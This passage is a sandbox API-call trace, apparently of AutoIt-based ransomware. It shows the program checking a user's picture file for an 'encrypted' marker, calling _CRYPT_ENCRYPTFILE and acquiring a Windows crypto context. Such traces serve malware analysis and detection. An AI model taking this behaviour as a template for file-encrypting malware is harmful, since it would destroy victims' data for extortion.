lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.488] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0041.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c928, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.489] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.489] CloseHandle (hObject=0x128) returned 1 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.489] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.490] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.490] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.490] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.490] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.490] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.490] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.490] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.491] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.491] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3e07f0, ftCreationTime.dwHighDateTime=0x1d5c255, ftLastAccessTime.dwLowDateTime=0xd28ab6b0, ftLastAccessTime.dwHighDateTime=0x1d5c40e, ftLastWriteTime.dwLowDateTime=0xd28ab6b0, ftLastWriteTime.dwHighDateTime=0x1d5c40e, nFileSizeHigh=0x0, nFileSizeLow=0xc15, dwReserved0=0x0, dwReserved1=0x777648, cFileName="RyGEMqdNb-RYBEky Y-C.gif", cAlternateFileName="RYGEMQ~1.GIF")) returned 0x7c20c0 [0041.491] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.491] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3e07f0, ftCreationTime.dwHighDateTime=0x1d5c255, ftLastAccessTime.dwLowDateTime=0xd28ab6b0, ftLastAccessTime.dwHighDateTime=0x1d5c40e, ftLastWriteTime.dwLowDateTime=0xd28ab6b0, ftLastWriteTime.dwHighDateTime=0x1d5c40e, nFileSizeHigh=0x0, nFileSizeLow=0xc15, dwReserved0=0x0, dwReserved1=0x777648, cFileName="RyGEMqdNb-RYBEky Y-C.gif", cAlternateFileName="RYGEMQ~1.GIF")) returned 0x7c20c0 [0041.491] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.491] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RyGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yGEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GEMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qdNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dNb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nb-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RYBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YBEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BEky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Eky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ky Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Y-C.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.493] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.493] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.493] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.493] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.493] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.493] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.493] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.493] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.493] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3e07f0, ftCreationTime.dwHighDateTime=0x1d5c255, ftLastAccessTime.dwLowDateTime=0xd28ab6b0, ftLastAccessTime.dwHighDateTime=0x1d5c40e, ftLastWriteTime.dwLowDateTime=0xd28ab6b0, ftLastWriteTime.dwHighDateTime=0x1d5c40e, nFileSizeHigh=0x0, nFileSizeLow=0xc15, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="RyGEMqdNb-RYBEky Y-C.gif", cAlternateFileName="RYGEMQ~1.GIF")) returned 0x7c2240 [0041.494] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.494] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.494] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.494] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.494] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.494] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.494] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.494] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.495] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0041.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.495] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0041.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.496] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.496] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.496] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.496] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.496] PeekMessageW (in: 